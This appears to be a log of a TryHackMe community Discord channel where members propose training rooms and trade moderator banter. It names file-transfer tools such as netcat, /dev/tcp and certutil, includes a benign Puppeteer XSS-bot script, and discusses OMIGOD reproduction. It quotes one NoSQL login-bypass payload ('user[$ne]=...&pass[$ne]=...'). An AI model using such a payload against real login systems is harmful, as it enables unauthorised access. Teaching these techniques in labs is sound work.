#room-ideas

1 messages · Page 9 of 1

lunar plank
#

What were you searching for exactly. Perhaps I can add keywords, get it added to a module or so

tranquil marsh
#

Also, a missed opportunity to not have it in the complete beginner path don't you think?

cedar echo
#

it's in the web path iirc

wary junco
#

Can the attack box open in a new window instead of split screen? For us dual and tri monitor enthusiasts, and those that don’t want it on the right side, as we can also change the size of the attack box to what we are more comfortable with.

#

I feel wayyy more comfortable using openvpn for that reason despite being subscribed. I don’t know how others feel but just an idea 🙂

lunar plank
wary junco
#

Ah thanks so much

lunar plank
waxen night
#

Are there any Windows/AD hardening rooms? I know there's a set of Ubuntu hardening rooms (which were very good), but I haven't seen the same for Windows.

karmic raven
#

AD doesn’t harden

#

it softens

native raptor
#

Does when you configure it

karmic raven
#

False

native raptor
#

Cry... you have a knack for making things vulnerable entirely unintentionally

karmic raven
#

Sorry you misspelled Windows

native raptor
#

Sweetie, you're one to criticise spelling smh

lunar plank
#

Now, now fellas KEKW

tacit anvil
#

will there ever be another cicada room, with it being named vol1? one of my favourite on thm.

karmic raven
#

I actually have another one done I’ve just been sitting on it as my focus has been shifted

tacit anvil
#

Has anyone made a room dedicated to transferring files to and from a target machine? Covering all the possible methods on both Windows and Linux, using scp, powershell, simplehttp, netcat etc. There seems to be quite a few ways to do it from my experiences so far and I think a room that focuses on just this one aspect would be really helpful. If a room like this exists can someone point me in that direction?

dark sun
tacit anvil
#

Yeah, that's an awesome name for the room - good call. Would be really appreciated if someone could make a detailed room on the topic!

somber crow
#

Muir and I have discussed making it

dark sun
#

And you could approach it both from blue and red perspective, actually exfiltrating data as a pentester, and detecting such activity in logging data as an analyst. Can do nice tricks with exfiltration via DNS or other 'rogue' methods.

#

But sounds like a lot of work to create 🙂

somber crow
#

Even not going as far as exfiltration, copying files back and forth is kind of core.

tacit anvil
#

If you guys do decide to work on it, I'll be first in line to work through the room! Would be super helpful to see a guided approach to some of the other methods that I haven't already got in my notes. Thanks guys.

karmic ember
#

Somebody linked me to an article that covered a bunch of methods. I can dig it up if needed, but I'm guessing James has it handy and/or memorized

dark sun
timid nimbus
# somber crow Muir and I have discussed making it

This is actually an idea that entered my head today too; the PreSecurity and I believe bits of Complete Beginner touched upon it, but would be great to have a room to really drill into it and drill the practice.

native raptor
#

Heh, "Almost" is the operative word for that medium post

#

There are hundreds of ways to transfer a file. That's a decent list, but you can get a hell of lot more obscure than that 😆

#

Well James -- you up for it?
Once you're settled in at work and I've finished my current assignment?

placid pilot
placid pilot
tacit anvil
#

Maybe a room for perquisite knowledge before learning about Forensics?
and yes im suggesting this because i want to learn about forensics

tacit anvil
sick comet
grizzled urchin
#

Hi Friends, stuck at the very beginning of What the shell task 13. Been bouncing around this for a minute can't seem to move past any help would be appreciated. thx

fallow flicker
#

Oh and #room-help would be the right place to ask in the future :)

native raptor
#

Because you're currently trying to connect to an SSH server

cedar echo
#

base64 encoding and copy-paste?

native raptor
#

Plus netcat, socat, /dev/tcp + cat, rsync, certutil, powershell, ftp.exe, wsl, and tonnes of others

#

There are quite literally hundreds of ways to transfer files

#

Heck, it's possible to make web requests using pure bash

cedar echo
#

yeah but that's a pain

#

I looked into it once and have up

#

copy paste was easier

native raptor
#

I have a script for it

cedar echo
#

no doubt

tacit anvil
dark sun
coral ravine
dark sun
coral ravine
#

Nope

#

Private rooms don't award points

dark sun
#

bummer, would be nice if it's visible somewhere that it's made private

#

after joining it, I mean

sudden garnet
#

#feedback-and-ideas maybe request like a banner when you enter the room that says the room is private :)

icy trellis
#

Good shout jake

cedar echo
#

But it has to remain accessible for room testers

dark sun
#

what does the /jr/ stand for? that would be the one where a banner would also be nice.

#

joined room, I suppose?

sleek elbow
#

join room, lol

karmic raven
#

its more of a not as advertised feature of the site

graceful crane
#

Hi y'all! I made a room that has been in "ready" stage for a while now, any idea when it will go public? No rush, just wondering, because I'd like to add it to my resume the next time I update it

fallow flicker
snow mango
#

What if you made a room for FTK imager ?

karmic raven
#

Not a lot there to talk about IMO. It just does it’s job

tacit anvil
#

what do you guys think about a room that involves reverse SSH tunneling to access a VNC session running on localhost after gaining initial access? could be an interesting priv esc, maybe the VNC session is logged in as root

#

I haven't come across a room yet that involved VNC or using any linux desktop GUIs so that could be cool

native raptor
tacit anvil
native raptor
#

Not up to me, but I'll see what I can do 🙂

raven tinsel
#

some more buffer overflow, shellcoding based rooms would be awesome

#

some which can teach you about stuff like basic variable value overwrite to how to detect bad chars in exploit code to maybe writing your own shellcode

clever compass
#

Is there going to a Coding path ? This would be nice give some suggestive path to mastery. I would opt for Pyhon, C++ and Ruby.

fickle idol
#

but i agree, a full path would suit well

clever compass
#

@fickle idol Aweesome! Thanks for supa quick reply. I will check them out too. Thanks

marble currentBOT
#

Gave +1 Rep to @fickle idol

dark sun
#

full coding path sounds like a bit of scope creep for a site like THM, there's also codecademy etc, I'd say spend the cycles our content devvers have on keeping up with all new hacking techniques and vulnerabilities going around. But hey that's just my silly opinion ;p

somber crow
dark sun
#

was responding to the 'a full path would suit well' a few lines back, but ok 🙂

clever compass
#

I just discovered the new Scripting for Pentesyers which is what I had in mind so I consider my request completed 🙂 . Just a shame C++ not there but that is a monster so I understand.

compact summit
#

any chance my room "Intro PoC scripting" could be added to the new Scripting for Pentesters module? 🙂

native raptor
#

If that's a topic that's due to be covered, it will almost certainly be written from scratch by one of the full-time devs to slot in with other rooms in the module

karmic ember
#

Not sure if there already is one, but a room on BloodHound could be interesting

native raptor
#

There is one

karmic raven
#

Could use some updating to include a lot of the new features

native raptor
fading oak
#

probably go on the list with all the grammar updates

sinful cape
#

hi, I have a couple of ideas that might make the regexp exercises go better. Though I'm not 100% that it would work, but instead of verifying a string, maybe have the values that needs to be matched in JS, and use the regexp passed by the user, use it to match the strings , and if it matches, then it returns ok

#

This solves the issue of trying many different options and not finding the expected way

somber crow
#

That'd require a big overhaul on the site, like huuuuuge

sinful cape
#

wouldn't that be just a js file?

#

not sure how it is working right now, just an idea

somber crow
#

Not really feasible for a room from a community creator

sinful cape
somber crow
#

Rooms can either be made by THM staff/paid for by THM staff, or created by people in the community.

sinful cape
#

oh, i see, didn't know that

cedar echo
#

Given how the rooms work as well it might be a bit tricky as well, answers are generally static today, within a given tolerance

atomic radish
#

Hey hey, can anyone guide me how to build a vm that is vulnerable to ms08-067?

sudden garnet
lusty quarry
#

A room on AMSI?

native raptor
karmic raven
#

ez pz lemon squeezey done zo

native raptor
#

If Cry's lucky I may even approve it

lone blade
#

Hi, is there anyone who has finished NIS - Linux Part I? Those 2 questions of part1 come from nowhere. who tf is shiba3 and shiba4?

covert pier
#

Guys I’m doing cybermentor’s PEH course.I’m going to focus on bug bounty hunting.
So can anyone plz suggest me which room to start

#

What abt starting web fundamentals room?

rose cradle
#

not quite the intended purpose of this channel @covert pier , however, Web Fundamentals sounds like a good place to start for what you want, yes

marble currentBOT
#

Gave +1 Rep to @rose cradle

fossil granite
#

I have a challenge I have created and would like to submit. Can someone direct me to the right contact or docs to upload?

fallow flicker
grizzled urchin
marble currentBOT
#

Gave +1 Rep to @fallow flicker

astral oriole
#

what's the point of contact for Advent of Cyber contributions? 🙂

native raptor
#

Having said which, @lunar plank would likely be a good point of call.
(Pinging ya for a definitive answer CMN 🙂 )

odd knot
#

Are there rooms already present with Android Pentesting ?
If not an Intro Room would be good
Nothing sort of fancy but telling bout gennymotion and stuff. (Idk much too)

coral ravine
odd knot
lucid quail
#

Since we can have 2 machines deployed at once, we can have some connected rooms which basically acts as a 2 machines network.

native raptor
#

Have fun getting that through review

karmic raven
#

Kekw

flat glade
#

Pentesting desktop application

fair siren
#

Not allowed in #feedback. But thought I'd drop to say thanks for the new content / rooms

#

Lot of new things to play with 👍

cedar echo
flat glade
cedar echo
#

Any app in particular though? Desktop app is a wide range

#

If it's binex, there are a few challenges around that

sudden garnet
#

maybe something electron based?

weary adder
#

If I’m doing a learning path, please don’t put me in a room and then link to another room halfway through. Put a snippet in so I can learn that one part I need to do the room I’m in, then give a link for if you want to learn more afterwards

karmic raven
#

As a room creator I disagree with that

#

I agree it shouldn’t be in the middle of a room

#

but it just clouds up the room a lot if we include random bits of information you need

cunning thunder
fair siren
#

Would it be a good idea to add Metasploitabe2 & 3 ? Just as a warm up / punch bag / shooting gallery

sleek elbow
#

that's kinda up to rapid7

#

youll need to reach out and ask for permission and how they want accreditation and all that

sudden garnet
#

can we get a room on how tor works in-depth?

gaunt cosmos
#

Sounds like a room for @naive notch

sudden garnet
#

true that stuff he was posting before went right over my tiny little pee brain

naive notch
#

I got a whole locally virtualised Tor network infrastructure with hidden services ready for deployment if they wanted to turn it into a network

tacit anvil
#

is Marianas web real?

elder bane
#

as far as I know, it's just a myth

naive notch
manic holly
#

What do you think about creating a room/module for Cisco security and configuration commands?

somber crow
#

Would be very difficult to make that interactive

#

As you can't get legitimate OS images

manic holly
#

What do you mean?

somber crow
#

As in you couldn't make the room practical

#

because you can't run Cisco ios properly, due to the licensing

manic holly
#

Oh I understand...

#

How unfortunate then lol

somber crow
#

It'd be good content but the legals make it difficult

manic holly
#

Yeah I get it

#

I was practicing with Cisco Packet Tracer and the idea came across my mind so I told myself why not talk about it

sudden garnet
#

yeah i was looking into it a while back and packet tracer was the only option i found, so you could do it all within that

lament kayak
#

I didn't see any channels related to Try Hack Me's Twitter account but that is what I have an idea for. I think it would be fun to take advantage of Twitters Poll functionality but use it to ask a Cyber Security questions. ie:

What is the exploitation of a vulnerability, design flaw or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users?
Option 1: Cross Site Scripting
Option 2: Privilege Escalation
Option 3: Phishing Attack
#

Something along those lines, I think it would be fun, perhaps even make it a contest of sorts.

manic holly
#

It would be cool if there are more badge to win
It'll feel rewarding after completing a room or a module

barren dagger
#

Hello Guys !! I am just trying to create a new tryhackme room . Can anyone guide me about the network configuration of the VMS to be set before finally uploading it to tryhackme ????

native raptor
marble currentBOT
#

Gave +1 Rep to @native raptor

simple sapphire
#

More rooms for code injection practice would be cool

slender turtle
#

domain clobbering?

cedar echo
#

Might be hard without proper dns

cedar echo
simple sapphire
cedar echo
simple sapphire
#

Sweet! Thanks :D

orchid dragon
#

Can I somewhere see which boxes are in the approval process, so I am not making box which is already being created? I was thinking about doing challenge about ROP/ret2libc because there is not a lot of content about binary exploiting on thm.

karmic raven
#

No, not really and I don’t see it being a feature at all. The easiest solution is to just join the creators lounge here and talk to other creators

native raptor
orchid dragon
marble currentBOT
#

Gave +1 Rep to @native raptor

native raptor
#

Mhm, exactly 😄

cunning thunder
fiery rapids
#

I want to make a vulnerable machine,
So, from where should I start

#

I have no experience of developing a machine

marble currentBOT
#

Gave +1 Rep to @sleek elbow

simple sapphire
#

How about a fallout themed room? That'd be fun

karmic raven
#

We can allude to it but we can’t directly make a fallout (game) room. That is assuming you’re referencing the game

simple sapphire
#

The game series, yup.

#

Was playing new Vegas and it gave me the idea lol

frozen summit
marble currentBOT
#

Gave +1 Rep to @sterile igloo

somber crow
#

@native raptor Desktop? Right click?

#

Nvm I managed it

native raptor
somber crow
native raptor
#

Oh, yeah

somber crow
#

If they leave the server, I literally can't right click ban from mobile

wary junco
#

Something similar to over the wire to better learn the Linux file system and commands? I really enjoy over the wire but the way you guys teach benefits me so much more than anything else. Something really really in depth

#

Like a tryhackme version of explainshell/overthewire if that makes sense? Not sure how to put it

odd knot
wary junco
marble currentBOT
#

Gave +1 Rep to @odd knot

ashen osprey
#

Idea: a company that did a pentest some time ago and now it's our turn to do a pentest. make use of artifacts left by the previous pentester(s). For example: a previously vuln upload function got patched but the payload uploaded by the previous pentester didn't get cleaned up, allow us to get something like an RCE despite the upload being patched.

native raptor
ashen osprey
#

I believe I've heard stories of pentesters sometimes leaving some artifact behind like maybe a golden ticket with default credentials

native raptor
#

Which means if that happens, the scenario should be following the footsteps of an attacker. Look at Overpass 2 (I believe) for that.

ashen osprey
#

My idea was that this uses the uploaded exploit even though it's been patched.

native raptor
#

Like, they would have grounds to sue you for criminal negligence. That kind of serious.

ashen osprey
#

Well it was something I heard somewhere on youtube or something, so I don't know how things went for those testers

native raptor
#

The pinnacle of informational accuracy of course 😆
But yeah, if you want a "follow the attacker's trail and use their payloads to get into a patched system" thing, check out Overpass 2

ashen osprey
#

overpass had a lot we can trace, even a packet dump I think. I wanted something less obvious

#

exploiting something that's been patched was the idea

native raptor
#

Actually, y'know what, that may be doable 👀

ashen osprey
#

As a hint, we can have another packet dump or a note talking about the previous engagement

karmic raven
#

ree

lunar plank
#

hello @karmic raven

karmic raven
#

hello cutie @lunar plank

lunar plank
karmic raven
#

good! Its been really busy

lunar plank
astral oriole
#

how about an omigod room?
has someone an idea where to get an omigod affected VM?

karmic raven
#

I know where to get one but we have to use caution with just dropping malware sites

#

also AWS would not vibe with that idea they’re super strict

astral oriole
#

or we could just install an old OMI versions

karmic raven
#

I mean we could but it would probably be decently difficult to set up and along with that it is being actively exploited so we can’t really release anything now

native raptor
astral oriole
native raptor
#

The big problem is realism. An AWS VM affected by an Azure vulnerability

astral oriole
#

it doesn't have to be an original "big 3" VM, has it?

#

i think it's more about the OMI CVEs

#

(when it comes to building a room)

#

I'm setting up an ubuntu vm an install v1.6.8-0 to see if the PoC works on it

native raptor
#

I mean, you should be able to install it on any Linux machine, in theory 🤷‍♂️

astral oriole
#

let's see 🙂

karmic raven
#

same thing happened with zero logon and a bunch of others

native raptor
karmic raven
native raptor
#

Nowhere near as long as it would without a patch though

astral oriole
#

i could install omi 1.6.8-0 and 1.6.6-0 and start the server (ports open) but Idk how to configure it with the basic auth. the PoC exploit just won't work. idk

dull adder
#

But I would like to explain why this vulnerability is generated and that part would take me some time, Anyone want to work this part ?

dull adder
#

it can be seen that they are only defining the content type header becasue not necesary the authoritation header.

#

if you will send this request making the authorization header with invalid credentials you would get a error 401.

astral oriole
#

I had a look at the releases' source diff but wasn't able to spot "that one" line of code straight away

astral oriole
gilded rampart
#

Hello there, i have some questions regarding room creation

#

Anyone ?

sudden garnet
#

you have not asked a question

gilded rampart
#

Can i dm you?

sudden garnet
#

sure

wary junco
#

A more in depth guide to understanding the Linux file system maybe? Linux funds part 4 5 6? Something of the sorts

karmic raven
#

What more is there to understand?

#

it’s pretty basic tbh

wispy finch
somber crow
wispy finch
somber crow
#

2017 is still the current one

wispy finch
#

I see
thanks!

scarlet solstice
#

Having more post-exploitation stuff will be nice.

unborn fable
#

It would be great if TryHackMe could add some more OSINT rooms, and some rooms dealing with pentesting report writing.

orchid dragon
#

Is there any guide or forum post for creating code blocks inside a room like this one? I would like to implement it in my own room but couldn't find any information about it.

lament star
somber crow
#

@lament star @orchid dragon It's pinned in creators lounge, Quick I can add you if you'd like.
Using carbon is bad because it's images of code, not accessible to screen readers.

orchid dragon
timber magnet
#

How about Stored XSS using <iframe> and SVG upload to leak cookies or other stuff?
Is there a room about this?🙂

#

BTW, how does the room with XSS run the JavaScript code?
Is it phantomJS or something similar they make use of?

somber crow
#

But I had a WIP POC for a new version that used Selenium

timber magnet
# somber crow pretty sure it doesn't actually run it

What do you mean by this?
They don't run it
For instance, there was room by timtaylor
Where we could create a Ticket that is read by the Admin which exploits Stored XSS to perform some action as them
How do they run that JavaScript code?

somber crow
timber magnet
#

A selenium headless browser fetching the Admin page as a cronjob 🤔

somber crow
timber magnet
#

I can't add a reaction to your posts smh
Please let me know if I have broken some rule😅
Thanks, I got it what to do now😁

sudden garnet
#

i use puppeteer (node) for my xss stuff, there’s also a python fork of it

cedar echo
#

PhantomJS is basically dead afaik

timber magnet
#

And Chrome and Chromium now supports headless, not a separate package🤔

cedar echo
#

yeah, I've had issues with phantomJS in the past

sudden garnet
cedar echo
#

might be interesting to put a poc on github

sudden garnet
#

eh, someone can stick it on github if they want:

const puppeteer = require('puppeteer');

(async () => {
    const browser = await puppeteer.launch({ ignoreHTTPSErrors: true, args: ['--no-sandbox'] });
    const page = await browser.newPage();

    await page.setCookie({ name: 'login', value: 'cookie', domain: 'localhost' });
    await page.goto('http://localhost');

    await browser.close();
})();
tacit anvil
#

ettercap room?

narrow phoenix
#

a room showing how a VPN doesn't really make you as anonymous as much as ads claim?

icy trellis
#

I feel like having a room for that might be a little overkill, maybe a room on setting up your own VPS and a breakdown on how they work? ^^

sudden garnet
#

you mean vpn jabba?

dark sun
#

You could do that with a pcap containing a lot of vpn and non-vpn traffic, and having the user correlate in that data. Like visiting the same sites, time pattern analysis, etc.

#

and/or "leaked logs" from some provider that would contain the unencrypted data that was going through the vpn at some time

icy trellis
nova nimbus
finite rose
graceful crane
#

I'm wondering how feasible a full on malware reverse engineering room would be. I'm taking a malware class in grad school, and it's super cool, although I'm trying to think if there's a way I could render some of the stuff I'm learning into a room. I'm thinking a VM running Ghidra or IDA would be super slow on THM, and I'm not sure how AWS would like us hosting a room with a live malware binary. I know we have a malware RE room, but it's just an RE ctf. I'd love to do a walkthrough reversing a real sample. Anybody have thoughts?

karmic raven
sudden garnet
#

i know cloud has been talked about a lot before - but if anyone is an aws wizard, i think a room on using the aws cli with localstack (https://github.com/localstack/localstack) would be a great compromise :)

torpid kraken
modest trail
#

Not sure how Pacu would deal handle localstack but it would be a great tool to showcase if it works with it

subtle grove
manic cradle
#

Attacking Kerberos Task 4 need to get hash file; it is a bit hard to get it intacted. I use this method to get it easily ; cat hash.txt | tr -d " \t\n\r" > hash1.txt , then use hash1.txt

grand temple
#

Can everyone publish rooms?

fading oak
#

you can create a room, there is a review process before it is released

grand temple
#

Okay, thank you!!

#

And is there a way of entering the review process before the room is 100% done so to make sure I don't create it for nothing?

fading oak
#

the room has to be 100% when it goes to review, you will get feedback on the review, request the "Creators lounge" role from a mod and you can ask questions in that channel

grand temple
#

Thanks!! c:

austere orchid
#

Hi

#

Guys, you can make a room info for the Hacking hardware, it would be cool, and revolutionary

heavy void
#

yes like hackrf based something

molten osprey
#

someone know a way to use the discord token

somber crow
#

@molten osprey This channel is for suggesting new tryhackme rooms

molten osprey
#

oh ok

#

sorry

coral obsidian
#

itll probably take a ton of time to make but an osx room would be cool

karmic raven
#

I say that lightly because theoretically its possible but its also really weird

coral obsidian
#

I know but as a one time thing it could be cool

karmic raven
coral obsidian
#

Idk it was just an idea😭

wary junco
#

Osx?

coral obsidian
wary junco
#

Ah

ashen lagoon
#

Do we have room about XOR ?

native raptor
ashen lagoon
#

Yes something like that

#

and maybe even some challenge rooms about it to decrypt them

native raptor
#

That would have to be in amongst a bunch of other encoding methods -- it's a very simple concept, so it's not really enough for a room by itself

ashen lagoon
#

Okay

#

I was just wondering 😄

plush harbor
#

Do we have a room about FTK Imager?

#

Is one of the most used tools in digital forensics

karmic raven
#

@ashen lagoon ^

heavy void
#

A room where we to use autopsy tools, I want to use and learn it like it has been in VMs for a long time

ashen lagoon
fervent arch
#

A room where we to use autopsy tools, I want to use and learn it like it has been in VMs for a long time

opaque bronze
#

Hey creators ,can you tell me which distro is the best and simple ?

somber crow
opaque bronze
#

Thanks

wary junco
#

Maybe someone doing a walkthrough of an easy+medium+hard Box? Like a really in depth uncut walkthrough explaining their entire thought process and why they did what they did and thought what they thought. This isn’t really a room idea I know but these kinds of videos would be very helpful for everyone of all kinds of skill levels. Kind of like how in depth Miuri goes on the boxes that he makes if that makes sense.

#

I’d pay to see that tbh

#

Especially if it was Miuri (no offense to anyone else sorry just the way he explains things, I just get it)

modest tree
#

A room on the dangers of Adb and how easily exploited it can be could possibly be a nice little addition. Especially with android embedded TV boxes ect in most places these days.

karmic raven
wary junco
native raptor
#

I hate doing video walkthroughs -- I'm too much of a perfectionist 😆
Might be convinced to stream at some point though

native raptor
karmic raven
native raptor
#

That's funny. My three year old cousin called this drawing he did at nursery a perfectly crafted work of art too:

#

Considering your emotional and intellectual maturity levels are both about the same as that of a three year old, it checks out that you would also consider your rooms to be perfectly crafted works of art when, in reality, they're really just crayon scribbles on a page 🤷‍♂️

karmic raven
native raptor
#

😁

karmic raven
native raptor
#

smh. I think we both know what would happen if I got asked to write the exploit dev stuff Sweetie ♥️

karmic raven
#

Yeah, I know exactly what would happen

#

You would come crawlin up in me DMs asking for help

#

Oi Cry! Oi Cry! Please Help! I have no clue what Im doing with small monkey brain

native raptor
#

Riiiiiiiiiiight 😆

#

That's what I have Spooky for 🤷‍♂️

#

Why have the cheap knock-off when I can have the original?

karmic raven
native raptor
#

Photoshopped 🤷‍♂️

#

That didn't happen

#

Or, more likely inspect elemented

#

Even if that were true though, it proves nothing. "Awesome" doesn't mean "Better than mine"

karmic raven
native raptor
#

Said the doctor at your last check up

#

(For anyone watching this and wondering what the heck is going on by the way, I would like to make very clear that this is a long-running joke. We do not actually hate each other)

karmic raven
#

Muiri arent your supposed to be the lead mod and ensure everyone uses the appropriate chats. This chat doesn't seem very appropriate

#

Is that why they gave you the lead mod role?

#

Because you werent good enough for anything else?

native raptor
#

Meh, perks of the position 🤷‍♂️

native raptor
karmic raven
#

May I remind you: I'm the one with a job and not a volunteer

native raptor
#

Meh, I work in industry as a day job -- you don't 🤷‍♂️

native raptor
#

Cry be like

karmic raven
#

You trying to make fun of the fact Im asian?

#

seems targeted.

native raptor
#

A) You're not Asian, Sweetie. I have a photo of you, remember?
B) No, you're a child, and we both know it smh

karmic raven
#

must be to compensate in other areas

karmic raven
native raptor
#

....

#

Really..?

karmic raven
#

(I guarantee everyone watching is super confused rn)

native raptor
#

That was a stretch, even for you 😆

karmic raven
#

@native raptor Youre distracting me from my big boy work

native raptor
#

Cry, the day you actually do any work without someone sitting you down and standing over you to make sure you do it will be the same day Hell freezes over

karmic raven
native raptor
#

Oh Sweetie, I contributed useful things before you started learning to hack ♥️
You keep fooling yourself, but it's slightly sad that 100% of your brain power is equivalent to everyone else's 5%

karmic raven
native raptor
#

Remember who helped you fix all the crap in your very first room?

#

Heck, did I not have to set up a Python webserver on that Cicada box for you so you could take material off it for a full rebuild locally because you didn't know how to make one?

karmic raven
native raptor
#

Look back at our very first messages

#

I had to set you up a webserver on it for some reason

#

Might have been to transfer files from the AttackBox

karmic raven
#

Muiri bb

#

weve single handedly made this channel useless

native raptor
#

Ickle baby Cry before he developed an ego. So cute! blobheart

native raptor
karmic raven
wary junco
#

Stream Miuri

#

I’m not askingkermit_gun

opaque bronze
native raptor
opaque bronze
#

I'm thinking to Create a room

wary junco
#

morning miuri

native raptor
marble currentBOT
#

➕ Gave the role Creators-Lounge to A R U N#5174

native raptor
#

You would be better asking in there

opaque bronze
#

Sure

finite rose
#

blobheart it was a nice chat between you guys Muiri vs Cry 😂

austere orchid
#

Hey, put a bash scripting room please

#

I've actually learned for other sites, but I think it may be a cool topic

marble currentBOT
#

Gave +1 Rep to @native raptor

native raptor
#

Maybe have a look to see what exists before requesting that someone builds it...
Research is the key to hacking. Not a great look if you can't find the learning materials 😆

obtuse herald
#

Had it in the wild, might be a good teacher of how default creds can ruin your org.

karmic raven
autumn moon
#

I am working on a New Networking /Recon Room. I hope I can release it next weekend!

native raptor
burnt panther
#

Hey someone who has pentest experience should create room which cover pentest report writing.

somber crow
#

It would be ridiculous for the creator to mark or even just read each pentest report

coral obsidian
#

It wouldn’t be that efficient but could be a nice experiment to see how the community reacts to stuff like this

cedar echo
#

Or you could do wreath instead

coral obsidian
#

Wreath is lowkey fun but how is it related? Not trying to be rude btw

cedar echo
#

The writeup is expected in report format, and there's a short section on writing the report

coral obsidian
#

Ohh true

#

And honestly a ctf platform isn’t meant to teach you how to become a pentester that is ready for a job😂

#

Imagine coming to a job interview being like “yeah I’m god on THM and finished all the networks”💀

native raptor
#

THM is also used extensively by companies and universities looking for training 🤷‍♂️

#

A lot of the challenges aren't particularly realistic, but most of the walkthrough stuff is.

coral obsidian
#

Oh that's awesome I didn't know that xD

cedar echo
#

I try to make my challenges somewhat realistic.

#

or at least something a forgetful admin and/or dev might do

cedar echo
#

I have an interesting concept in mind, but I'm not sure if it's viable yet

coral obsidian
heavy sluice
#

(Not sure where to send)
Can you please add "vip/free" tag here? This will help to practice VIP rooms first .....before ending subscription

cunning thunder
# heavy sluice (Not sure where to send) Can you please add "vip/free" tag here? This will help ...

This is a good idea, it's currently only available in Modules on this page: https://tryhackme.com/hacktivities. For example, the module you're looking at: https://tryhackme.com/module/intro-to-web-hacking
Hope that helps. 🙂

marble currentBOT
#

Gave +1 Rep to @native raptor

heavy sluice
old hill
#

@cedar echo

cedar echo
#

K

old hill
#

Dope

old hill
cedar echo
#

Saw

old hill
#

Ok. Cool. Just making sure

balmy hamlet
#

Hello. Is it intentional that the "Active machine information" div sticky normally but is not as soon as you launch the attack machine (split view in general) ??

#

to be honest, would be cool, i think, to make it sticky in the split view again so i dont have to scroll up for the ip if i happen to need it again, especially with rooms with couple of machines

somber crow
balmy hamlet
#

Sure thing 🙂 thanks

tacit anvil
#

proxychain tutorial

karmic raven
#

Also a few challenge rooms which require its use as well IIRC

tacit anvil
sudden glade
#

There should be a learning path for more different eLearn security certs

#

WAPT, WAPTX, and PTX should all be learning paths

#

Or SANS training IMO

#

Or Offensive Security’s OSEP, OSWE, and OSED IMO

karmic shell
#

We need dynamic flags. Static flags are being shared.

modest trail
modest trail
native raptor
#

As optional says -- we don't really care. THM is about learning -- if you steal flags then the only person you're cheating is yourself.

cunning thunder
somber crow
native raptor
sudden glade
#

Why not create an advanced web hacking path that is meant to be done after web fundamentals?

#

Or a senior penetration tester path?

#

And does the offensive security path no longer prepare students for the OSCP material wise?

#

Or is it just the name that was changed

#

Why not ask more providers to collaborate with?

#

Like eLearn or something

#

Or some other provider?

#

Or OffSec even?

#

Like maybe if Offensive Security was ok with it in advance it would be ok?

native raptor
#

Why would they? They have PWK, the OTL, and their own labs. THM having official training for it doesn't offer them anything.

native raptor
native raptor
native raptor
sudden glade
#

Ok. What about an intermediate and advanced web hacking path?

#

Or wireless hacking path?

#

Etc?

native raptor
#

Most cert providers offer practical training for practical certs. THM doesn't offer anything on top of that

native raptor
sudden glade
#

Ok fair

#

How long will it be before more advanced web hacking pathways will be available probably since you just said they are already being built?

native raptor
#

I said they might be being built. I can't go into any details on upcoming stuff -- that's above my paygrade I'm afraid. I do know there's some fun stuff planned for the not too distant future though.

sudden glade
#

It would be great to have everything required to be able to start bug hunting in one place lol

#

Thanks for the honest answers

cunning thunder
sudden garnet
#

i'd like to see more "evasion" techniques personally

the way the challenges were presented in this room (task 7) was really nice: https://tryhackme.com/room/xssgi, and imo went further than i would expect for a jr level. but the same type of idea for more web vulns would be nice (xxe, ssrf, request smuggling, deserilsation)

sudden glade
#

I would like to see a mega course in intermediate to advanced web hacking that teaches essentially is as in depth as pentesterlab and/or portswigger but also covers tools, and then an even more advanced course to master applying Python to web hacking at a really in depth level

#

And maybe knowing Python separately would be a plus

#

I also think something similar should be done for wireless hacking and network hacking

#

Ideally

#

With Python as well but before that covering basics of wifi hacking, MITMs, etc, and going all the way through hacking Enterprise wifi

#

And also learning path for Kali SET

sudden glade
#

I also think that I would like to see a room or two for report writing

#

Like how to write reports

native raptor
modest trail
native raptor
sudden glade
#

Oh cool we do have a report writing room I didn’t know that

#

Yeah I mean I really want to aim the complete all the current learning paths in six months

#

Hopefully by then new ones will be up

#

Would you say that’s a valid thing to hope for?

karmic raven
#

We obviously cannot say a lot about what we having going on behind the scenes

#

we have a lot going on and these things take a lot of time and effort to put out

#

be patient. This channel is really here for suggestions of 1 or 2 unique rooms not a whole multiple path outline that would potentially take us months or years

sudden glade
sudden glade
#

I feel like the different ways of hacking enterprise wifi could be a room in of itself

#

an advanced room

#

maybe you could include it in a future learning path, like if we ever have a Sr. Penetration Tester path

#

etc

steep bay
#

im in network services 2, and im doing the enumerating NFS task 3. this scan takes nearly 2 hours to complete. this has made it very difficult to complete as i dont often have 2+ hours to spend on the scan, alone....

jade arch
#

Why not to create paths that focuses on other careers than penetration tester and security analyst such as security engineer, consultant or even CISO

covert cloak
#

I would like to see an SELinux room, trying to find some good resources on setting up and good practices etc, not finding anything that really stands out, maybe not searching hard enough 🙂

somber crow
covert cloak
marble currentBOT
#

Gave +1 Rep to @somber crow

sudden glade
#

I know we aren’t supposed to give learning path ideas but I am wondering why no Linux or Windows specialty learning path exists

#

Couldn’t an entire learning path be made out of one of either OS?

#

I mean we have enough material already on the site it just has to be organized right?

tacit anvil
#

make the user without root access called "root" to troll troll

torpid kraken
#

A room about SAML and signature bypass techniques.

coral ravine
#

Holo has signature bypass techniques

cedar echo
tacit anvil
karmic raven
#

I dont think so. Its probably reserved, that being said cant say I've ever tried but seems like it would def cause issues

native raptor
#

It's possible, but it's also really fricken' stupid 😆

#

If you're going to troll in box dev, do it with class or it's just tacky. Cheap tricks don't tend to get passed review 🤷‍♂️

cedar echo
#

I suppose it goes by uid

cedar echo
native raptor
#

And I doubt you've gone tacky smh

cedar echo
wraith stag
#

Hi. i just finished the Nosqlinjection room yesterday.

but i'm still wondered how all those injection payloads lead to a valid mongodb query.

e.g when bypassing the login we use => user[$ne]=ases&pass[$ne]=eue

somber crow
regal magnet
#

in my opinion new CVE's must be demonstrated like the one discovered against exchange servers & that sudoers flaw that was discovered last year so we'll have the idea how pentesters found and exploit it

slender turtle
plain canopy
#

Good night!

#

I'm looking forward to making an Samba exploitation room any thought on that?

ionic vine
#

Hello!! Been looking around for courses in coding skills for ethical hackers. Will be awesome to see a learning path covering various languages focused in a security perspective like: C# (for developing Windows hacking tools), Javascript (for webapps and advanced XSS), ruby (for webapps scripting exploits), C/C++ (exploit development), Java and Swift (for mobile apps) and the old good classics (python, bash, powershell).

heavy void
#

TheXSSRat makes awesome content on XSS

cedar echo
coral obsidian
#

A windows services room, like those kinda new rooms but for windows, could also work for aoc3

stiff zealot
clear lotus
hoary shard
#

What about creating a path for cyber forensics? or more rooms of this topic? I don't see many people doing this so it would be huge for tryhackme I guess, I would pay more money for my subscription if needed

cedar echo
